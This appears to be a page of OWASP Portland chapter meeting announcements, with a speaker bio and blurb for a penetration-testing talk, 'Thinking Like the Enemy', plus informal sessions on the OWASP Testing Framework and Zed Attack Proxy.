The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Chapter meetings are free and open to the public.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

About Joe

This chapter meeting feature guest speaker Joe Basirico, Director of Security Services at Security Innovation. Joe is responsible for managing the professional services business at Security Innovation. He leverages his unique experience as a development lead, trainer, researcher, and test engineer to lead the security engineering team in their delivery of high-quality, impactful assessment and remediation solutions to the company’s customers. His ability to blend his technical skills with risk-based contextual analysis and unwavering customer commitment makes him an invaluable asset for each Security Innovation client.

Joe is an active member in the security and open-source communities, having contributed technology, training, utilities, expertise and methodologies. He manages the company’s engineering blog and has written several publications that focus on vulnerabilities at the source code level. Joe holds a B.S in Computer Science from Montana State University.

About the Talk - Thinking Like the Enemy

In this talk I will help you get into the Hacker's mindset from my ten years of experience as a penetration tester, assessing some of the most exciting applications in the world.

This talk will cover the most important qualities of a hacker or security tester, Top Vulnerabilities that you can't afford to miss as well as more difficult to tackle vulnerabilities that have caused tons of headaches and pain. By the end of the hour you'll better understand how to cause your application true pain, find a tiny weakness and cause the walls of security to crumble around it. After that we'll also talk about how to rebuild those walls to be more robust.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.

This informal chapter meeting will give attendees a chance to chat about whatever application security topics they are most interested in. Matthew will discuss the OWASP Testing Framework. Tim will offer his impressions of the Zed Attack Proxy. Other topics are welcome.

Jim Manico has offered to come and give us another great talk. Topic will either be "Top Ten Web Defenses" or "Securing the Software Development Lifecycle".

We will serve Pizza! Please RSVP by emailing {tim . morgan at owasp.org} so we can better estimate how much to order.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Chapter meetings are free and open to the public.